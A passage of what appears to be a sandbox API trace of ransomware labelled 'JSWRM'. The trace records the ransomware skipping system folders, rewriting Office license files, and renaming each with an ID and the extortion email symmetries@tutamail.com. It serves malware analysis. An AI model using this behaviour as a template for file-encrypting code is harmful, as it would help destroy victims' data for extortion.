nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.393] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.393] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0104.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.393] CloseHandle (hObject=0x45c) returned 1 [0104.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0104.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0104.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0104.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0104.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0104.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0104.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.393] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0104.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0104.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0104.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.395] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe559e56a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe559e56a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe565d12b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x632a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_Subscription-ppd.xrm-ms", cAlternateFileName="O3F979~1.XRM")) returned 1 [0104.395] lstrcmpiW (lpString1="O365BusinessR_Subscription-ppd.xrm-ms", lpString2=".") returned 1 [0104.395] lstrcmpiW (lpString1="O365BusinessR_Subscription-ppd.xrm-ms", lpString2="..") returned 1 [0104.395] lstrcmpiW (lpString1="O365BusinessR_Subscription-ppd.xrm-ms", lpString2="...") returned 1 [0104.395] lstrcmpiW (lpString1="O365BusinessR_Subscription-ppd.xrm-ms", lpString2="windows") returned -1 [0104.395] lstrcmpiW (lpString1="O365BusinessR_Subscription-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.395] lstrcmpiW (lpString1="O365BusinessR_Subscription-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.395] lstrcmpiW (lpString1="O365BusinessR_Subscription-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.395] lstrcmpiW (lpString1="O365BusinessR_Subscription-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.395] lstrcmpiW (lpString1="O365BusinessR_Subscription-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.395] lstrcmpiW (lpString1="O365BusinessR_Subscription-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0104.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0104.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0104.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0104.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0104.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0104.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0104.396] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.396] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=25386) returned 1 [0104.396] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.396] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6320) returned 0x24c1d0 [0104.396] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6320, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6320, lpOverlapped=0x0) returned 1 [0104.400] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.400] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6320, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6320, lpOverlapped=0x0) returned 1 [0104.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.400] CloseHandle (hObject=0x45c) returned 1 [0104.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0104.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0104.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0104.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0104.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0104.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0104.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.406] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0104.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0104.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0104.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.407] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5578312, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5578312, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5636f0a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_Subscription-ul-oob.xrm-ms", cAlternateFileName="O38A0E~1.XRM")) returned 1 [0104.407] lstrcmpiW (lpString1="O365BusinessR_Subscription-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.407] lstrcmpiW (lpString1="O365BusinessR_Subscription-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.407] lstrcmpiW (lpString1="O365BusinessR_Subscription-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.407] lstrcmpiW (lpString1="O365BusinessR_Subscription-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.407] lstrcmpiW (lpString1="O365BusinessR_Subscription-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.407] lstrcmpiW (lpString1="O365BusinessR_Subscription-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.407] lstrcmpiW (lpString1="O365BusinessR_Subscription-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.407] lstrcmpiW (lpString1="O365BusinessR_Subscription-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.407] lstrcmpiW (lpString1="O365BusinessR_Subscription-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.407] lstrcmpiW (lpString1="O365BusinessR_Subscription-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0104.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0104.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0104.407] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0104.407] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0104.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0104.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_Subscription-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0104.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0104.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0104.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0104.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0104.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.409] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11647) returned 1 [0104.409] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0104.409] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0104.411] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.411] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0104.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.411] CloseHandle (hObject=0x45c) returned 1 [0104.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0104.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0104.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0104.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0104.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0104.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0104.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.412] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0104.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0104.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0104.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.413] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5505c31, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5505c31, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe55c47dc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ba7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365BusinessR_SubTest-pl.xrm-ms", cAlternateFileName="O365BU~3.XRM")) returned 1 [0104.413] lstrcmpiW (lpString1="O365BusinessR_SubTest-pl.xrm-ms", lpString2=".") returned 1 [0104.413] lstrcmpiW (lpString1="O365BusinessR_SubTest-pl.xrm-ms", lpString2="..") returned 1 [0104.413] lstrcmpiW (lpString1="O365BusinessR_SubTest-pl.xrm-ms", lpString2="...") returned 1 [0104.413] lstrcmpiW (lpString1="O365BusinessR_SubTest-pl.xrm-ms", lpString2="windows") returned -1 [0104.413] lstrcmpiW (lpString1="O365BusinessR_SubTest-pl.xrm-ms", lpString2="recovery") returned -1 [0104.413] lstrcmpiW (lpString1="O365BusinessR_SubTest-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.413] lstrcmpiW (lpString1="O365BusinessR_SubTest-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.413] lstrcmpiW (lpString1="O365BusinessR_SubTest-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.413] lstrcmpiW (lpString1="O365BusinessR_SubTest-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.413] lstrcmpiW (lpString1="O365BusinessR_SubTest-pl.xrm-ms", lpString2="msocache") returned 1 [0104.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0104.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0104.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0104.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241268, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0104.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0104.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0104.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0104.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0104.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365BusinessR_SubTest-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2413a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365BusinessR_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0104.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0104.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0104.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0104.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.414] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 